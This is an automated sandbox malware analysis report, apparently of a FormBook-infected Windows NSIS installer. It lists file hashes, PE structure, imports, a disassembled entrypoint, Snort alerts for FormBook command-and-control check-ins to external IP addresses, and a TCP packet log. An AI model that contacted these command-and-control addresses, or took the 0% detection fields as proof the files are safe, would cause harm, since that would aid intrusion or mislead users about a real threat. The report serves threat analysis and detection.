                                                                                                                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):214568
                                                                                                                            Entropy (8bit):6.30310219025288
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
                                                                                                                            MD5:6D01A897D44DD4D25D7E1264407210FD
                                                                                                                            SHA1:332C3ADE84D0C1E5BE298C037F9FE222620343B2
                                                                                                                            SHA-256:DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
                                                                                                                            SHA-512:54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...#.B..........P..........d....................................2.....`... ......................................P.......`......................."..($..................................@...(....................c..8............................text....A.......B..................`.P`.data........`.......F..............@.`..rdata..\....p.......H..............@.`@.pdata..............................@.0@.xdata....... ......................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....X...........................@.@..tls................................@.@..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                            Entropy (8bit):7.537994904334399
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:aSsc9zh1ex.exe
                                                                                                                            File size:326847
                                                                                                                            MD5:d5e55a57372bcad45fbb260105179caf
                                                                                                                            SHA1:9b1935a927c072dd31017362ff1739bf1ea2aaf7
                                                                                                                            SHA256:3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
                                                                                                                            SHA512:088033564668a4fd3e107566387fecf0b6dcbd7a161c9ef3e4adb232520467a64af9eec740fe783d5c62fa3b79bdd910e72f3acc838e5fa155427c83003c407b
                                                                                                                            SSDEEP:6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
                                                                                                                            TLSH:07640144E6684D21FCBA0D3C0533D4A76974CC220879DBBB2BAE751A2BF51D1822FD67
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....

                                                                                                                            File Icon

                                                                                                                            Icon Hash:c8fbb7a7a7e3f80c

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x40350a
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                            Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            push ebp
                                                                                                                            mov ebp, esp
                                                                                                                            sub esp, 000003F4h
                                                                                                                            push ebx
                                                                                                                            push esi
                                                                                                                            push edi
                                                                                                                            push 00000020h
                                                                                                                            pop edi
                                                                                                                            xor ebx, ebx
                                                                                                                            push 00008001h
                                                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                                                            mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                                                            call dword ptr [004080CCh]
                                                                                                                            mov esi, dword ptr [004080D0h]
                                                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                                                            push eax
                                                                                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                            mov dword ptr [ebp-2Ch], ebx
                                                                                                                            mov dword ptr [ebp-28h], ebx
                                                                                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                            call esi
                                                                                                                            test eax, eax
                                                                                                                            jne 00007F9A84F8137Ah
                                                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                            push eax
                                                                                                                            call esi
                                                                                                                            mov ax, word ptr [ebp-0000012Ch]
                                                                                                                            mov ecx, dword ptr [ebp-00000112h]
                                                                                                                            sub ax, 00000053h
                                                                                                                            add ecx, FFFFFFD0h
                                                                                                                            neg ax
                                                                                                                            sbb eax, eax
                                                                                                                            mov byte ptr [ebp-26h], 00000004h
                                                                                                                            not eax
                                                                                                                            and eax, ecx
                                                                                                                            mov word ptr [ebp-2Ch], ax
                                                                                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                            jnc 00007F9A84F8134Ah
                                                                                                                            and word ptr [ebp-00000132h], 0000h
                                                                                                                            mov eax, dword ptr [ebp-00000134h]
                                                                                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                            mov dword ptr [007A8B18h], eax
                                                                                                                            xor eax, eax
                                                                                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                            movzx eax, ax
                                                                                                                            or eax, ecx
                                                                                                                            xor ecx, ecx
                                                                                                                            mov ch, byte ptr [ebp-2Ch]
                                                                                                                            movzx ecx, cx
                                                                                                                            shl eax, 10h
                                                                                                                            or eax, ecx

                                                                                                                            Rich Headers

                                                                                                                            Programming Language:
                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d60000x15908.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x66700x6800False0.667931189904data6.43600264122IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0xa0000x39eb780x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                            .ndata0x3a90000x2d0000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x3d60000x159080x15a00False0.471132135116data5.8124427271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                            RT_ICON0x3d62c80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                            RT_ICON0x3e6af00x25a8dataEnglishUnited States
                                                                                                                            RT_ICON0x3e90980x10a8dataEnglishUnited States
                                                                                                                            RT_ICON0x3ea1400x988dataEnglishUnited States
                                                                                                                            RT_ICON0x3eaac80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                            RT_DIALOG0x3eaf300x100dataEnglishUnited States
                                                                                                                            RT_DIALOG0x3eb0300x11cdataEnglishUnited States
                                                                                                                            RT_DIALOG0x3eb1500xc4dataEnglishUnited States
                                                                                                                            RT_DIALOG0x3eb2180x60dataEnglishUnited States
                                                                                                                            RT_GROUP_ICON0x3eb2780x4cdataEnglishUnited States
                                                                                                                            RT_VERSION0x3eb2c80x300dataEnglishUnited States
                                                                                                                            RT_MANIFEST0x3eb5c80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                            Version Infos

                                                                                                                            DescriptionData
                                                                                                                            LegalCopyrightAvnet, Inc.
                                                                                                                            FileVersion24.30.26
                                                                                                                            CompanyNameStewart Information Services Corp
                                                                                                                            LegalTrademarksPacifiCare Health Systems Inc
                                                                                                                            CommentsReliance Steel & Aluminum Co.
                                                                                                                            ProductNameMariner Health Care Inc.
                                                                                                                            FileDescriptionDisc Soft Ltd
                                                                                                                            Translation0x0409 0x04b0

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishUnited States

                                                                                                                            Network Behavior

                                                                                                                            Snort IDS Alerts

                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                            192.168.11.2041.203.18.17749768802031449 05/12/22-10:45:22.157985TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.11.2041.203.18.177
                                                                                                                            192.168.11.2023.227.38.7449776802031453 05/12/22-10:49:26.026441TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977680192.168.11.2023.227.38.74
                                                                                                                            192.168.11.2023.227.38.7449776802031412 05/12/22-10:49:26.026441TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977680192.168.11.2023.227.38.74
                                                                                                                            192.168.11.2041.203.18.17749768802031453 05/12/22-10:45:22.157985TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.11.2041.203.18.177
                                                                                                                            192.168.11.2041.203.18.17749768802031412 05/12/22-10:45:22.157985TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.11.2041.203.18.177
                                                                                                                            192.168.11.2023.227.38.7449776802031449 05/12/22-10:49:26.026441TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977680192.168.11.2023.227.38.74

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            May 12, 2022 10:41:57.595982075 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:57.803847075 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:57.804203033 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:57.812454939 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.020102024 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.024772882 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.024833918 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.024882078 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.024926901 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.024972916 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.025017977 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.025062084 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.025108099 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.025145054 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.025156021 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.025187969 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.025203943 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.025312901 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.025362968 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.025376081 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.025680065 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.025995016 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.233148098 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233278036 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233341932 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233402014 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233539104 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233603001 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233601093 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.233664036 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.233664989 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233726978 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233787060 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233784914 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.233849049 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233912945 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.233952999 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.233974934 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234004021 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234018087 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234030008 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234036922 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234040976 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234083891 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234098911 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234159946 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234220028 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234280109 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234308958 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234339952 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234359026 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234402895 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234464884 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.234489918 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234539986 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234554052 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234672070 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234781981 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234798908 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.234810114 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.442434072 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.442734003 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.442768097 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.442800045 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.442863941 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.442924976 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443073988 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443089962 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443124056 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443152905 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443228006 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443249941 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443290949 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443352938 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443412066 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443425894 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443474054 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443536043 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443594933 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443614006 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443658113 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443665028 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443680048 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443691015 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443701982 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.443720102 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443780899 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443839073 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443897963 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443958044 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.443958044 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444008112 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444017887 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444021940 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444078922 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444139957 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444139004 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444190025 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444200993 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444263935 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444313049 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444325924 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444363117 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444390059 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444436073 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444451094 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444451094 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444463015 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444473982 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444485903 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444514990 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444576025 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444612026 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444626093 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444636106 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444699049 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444758892 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444787979 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.444819927 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444880009 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444937944 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.444998980 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.445019960 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445059061 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.445070982 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445085049 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445096016 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445108891 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445121050 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.445153952 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445172071 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445184946 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.445374966 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445517063 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445545912 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.445558071 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.652834892 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653090000 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653114080 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653151035 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653199911 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653269053 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653292894 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653353930 CEST8049758203.170.86.89192.168.11.20
